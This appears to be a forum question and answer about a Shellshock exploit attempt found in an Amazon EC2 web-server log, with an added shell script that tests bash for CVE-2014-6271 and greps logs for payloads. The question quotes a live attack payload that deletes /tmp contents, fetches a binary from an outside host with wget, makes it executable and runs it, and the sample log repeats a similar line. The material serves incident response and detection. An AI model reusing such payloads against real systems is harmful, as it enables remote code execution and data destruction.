
Hack attempt on Amazon EC2 (Using wget to upload file to server)

I was looking through my logs and I noticed a very weird line.

[Fri Jun 26 21:21:36.420706 2015] [:error] [pid 21172] [client 58.213.123.107:56538] Target WSGI script not found or unable to stat: /opt/python/current/app/application.py, referer: () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://202.103.243.104:911/sudp -O /tmp/China.Z-foxr >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-foxr >> /tmp/Run.sh;echo /tmp/China.Z-foxr >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"

Looks like someone was able to upload a file, change it to 777, run it and remove it all from the /tmp/ folder.

I'm very confused since it requires an auth file from Amazon to be able to connect to the EC2 instance by SSH and I doubt that they got access to this file.

Is there any other way they could have got access? Could there be some permissions settings that are wrong on my instance?

This is an attempt to exploit the shellshock vulnerability. Judging by the error code it would seem it failed to execute, however I suspect you may find other instances in your logs.

The first step is to determine if you have a vulnerable bash version on your server. If the bash version is patched there is no chance of these attempts being successful. However if you are running a vulnerable version you should patch it immediately and then start looking through your logs for shellshock entries. Using grep to look for '()' or '; }' is a good place to start. It is worth noting that several shellshock exploits do not leave any traces of the payload in the logs.
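
The two checks the answer above describes, as an added example that is not part of the original question or answer: a probe for the original Shellshock bug (CVE-2014-6271) in the local bash, and a grep over web-server logs for the "() { ... ; }" function-definition prefix that Shellshock payloads carry in a request header. The function names are mine, and the sample log lines are constructed (with RFC 5737 documentation addresses), modelled on the Apache error-log line in the question plus an access-log line with the payload in User-Agent.

```shell
#!/bin/sh
# Added example (not from the original post): check the local bash for the
# original Shellshock bug, CVE-2014-6271, and grep a web-server log for
# Shellshock-style payloads. The sample log lines below are constructed
# (RFC 5737 documentation addresses), not taken from a real server.

# Returns 0 if the bash on PATH is vulnerable to CVE-2014-6271, 1 otherwise.
# The classic probe: export an environment variable that looks like a bash
# function definition with a command appended after the closing brace.
# A vulnerable bash runs the appended "echo vulnerable" while importing it;
# a patched bash only defines the function and prints "test".
bash_is_vulnerable() {
    out=$(env x='() { :;}; echo vulnerable' bash -c 'echo test' 2>/dev/null)
    case "$out" in
        *vulnerable*) return 0 ;;
        *)            return 1 ;;
    esac
}

# Print the log lines that carry a Shellshock-style payload: a function
# definition header "() {" with a body closed by "; }" (whitespace optional),
# which is what the exploit places in a header such as Referer or User-Agent.
shellshock_hits() {
    grep -E '\(\) *\{[^}]*; *\}' "$1"
}

# Number of such lines, printed as a bare integer.
shellshock_hit_count() {
    shellshock_hits "$1" | wc -l | tr -d ' '
}

# Constructed sample log: one Apache error-log line like the one in the
# question, one access-log line with the payload in User-Agent, one benign line.
SAMPLE_LOG=$(mktemp)
trap 'rm -f "$SAMPLE_LOG"' EXIT
cat > "$SAMPLE_LOG" <<'EOF'
[Fri Jun 26 21:21:36.420706 2015] [:error] [pid 21172] [client 203.0.113.7:56538] Target WSGI script not found or unable to stat: /opt/python/current/app/application.py, referer: () { :; }; /bin/bash -c "wget http://203.0.113.9/x -O /tmp/x;chmod 777 /tmp/x;/tmp/x"
203.0.113.8 - - [26/Jun/2015:21:22:01 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 209 "-" "() { :;}; /bin/bash -c \"id\""
203.0.113.10 - - [26/Jun/2015:21:22:05 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0 (compatible; example)"
EOF

if bash_is_vulnerable; then
    echo "bash is VULNERABLE to CVE-2014-6271: patch it before doing anything else"
else
    echo "bash is not vulnerable to CVE-2014-6271 (the later Shellshock CVEs need their own checks)"
fi
echo "Shellshock-style lines in $SAMPLE_LOG: $(shellshock_hit_count "$SAMPLE_LOG")"
shellshock_hits "$SAMPLE_LOG"
```

Run it on a real server by pointing shellshock_hits at the actual Apache error and access logs instead of the constructed sample. The probe only covers CVE-2014-6271; the follow-up bash parser bugs disclosed after it are not exercised by this one-liner, so treat "not vulnerable" as "patched for the original bug" and confirm the package version against your distribution's advisories. And, as the answer says, a clean grep is not proof of no attempts: the payload only appears in the log when the server happened to log the header that carried it.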
